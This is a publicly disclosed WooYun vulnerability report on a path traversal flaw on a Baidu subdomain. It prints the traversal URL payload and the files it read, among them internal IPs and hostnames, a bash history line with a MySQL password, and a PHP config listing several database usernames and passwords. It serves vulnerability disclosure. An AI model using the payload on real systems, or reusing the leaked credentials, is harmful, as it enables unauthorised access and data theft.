当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190419

漏洞标题:百度某站点任意文件遍历(泄漏多个数据库帐号密码)

相关厂商:百度

漏洞作者: lijiejie

提交时间:2016-03-29 16:02

修复时间:2016-05-13 20:00

公开时间:2016-05-13 20:00

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

简要描述:

百度某站点任意文件遍历(泄漏数据库帐号密码等)

详细说明:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1


可以读取任意本地文件。

dz.baidu.com.png

漏洞证明:

DEVICE=eth1
BOOTPROTO=static
IPADDR=10.26.186.23
NETMASK=255.255.255.0
ONBOOT=yes


得到IP地址是10.26.186.23。再读取/proc/self/environ:

MANPATH=:/usr/share/baidu/man
HOSTNAME=tc-dev-light01.tc.baidu.com
TERM=linux
SHELL=/bin/bash
HISTSIZE=1000
SSH_CLIENT=10.48.50.43 43745 22
SSH_TTY=/dev/pts/0
USER=work
LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
SUDO_USER=zhaojianqi
SUDO_UID=194560
OPHOME=/home/op
OPTOOL=/home/op/opbin/optool
MAIL=/var/spool/mail/zhaojianqi
PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
PWD=/home/work/php/sbin
INPUTRC=/etc/inputrc
EDITOR=vim
LANG=en_US
SUDO_COMMAND=/bin/bash
SHLVL=5
HOME=/home/work
LOGNAME=work
SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
SUDO_GID=100000
G_BROKEN_FILENAMES=1
_=/home/work/php/bin/php-cgi
FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock


得到主机名: HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history


历史命令泄漏了MySQL密码:

/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r  --default-character-set=utf8


源代码中还泄漏了数据库配置信息,有较多的数据库密码:

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php
  /**
     * DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数
     * @var array
     */
    static $arrDBProxyServer = array(
        self::DBPROXY_OPENPLATFORM_INDEX => array(    //open-platform dbproxy集群
            'username' => 'developer_w',
            'password' => 'v60KOStx8cMQrv60',
            'port' => 6014,
            'jx' => array(
                '10.46.7.20',
                '10.46.7.20',
            ),
            'tc' => array(
                '10.42.8.18',
                '10.42.8.18',
            ),
        ),
        self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array(  //open-platform dbproxy集群
            'username' => 'openplatform_r',
            'password' => 'oY3DHhmW1BFfkUYy',
            'port' => 5352,
            'jx' => array(
                '10.202.95.49',
            ),
            'tc' => array(
                '10.202.95.49',
            ),
        ),
其余省略

修复方案:

正确处理path

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-29 19:53

厂商回复:

感谢对百度安全的关注

最新状态:

暂无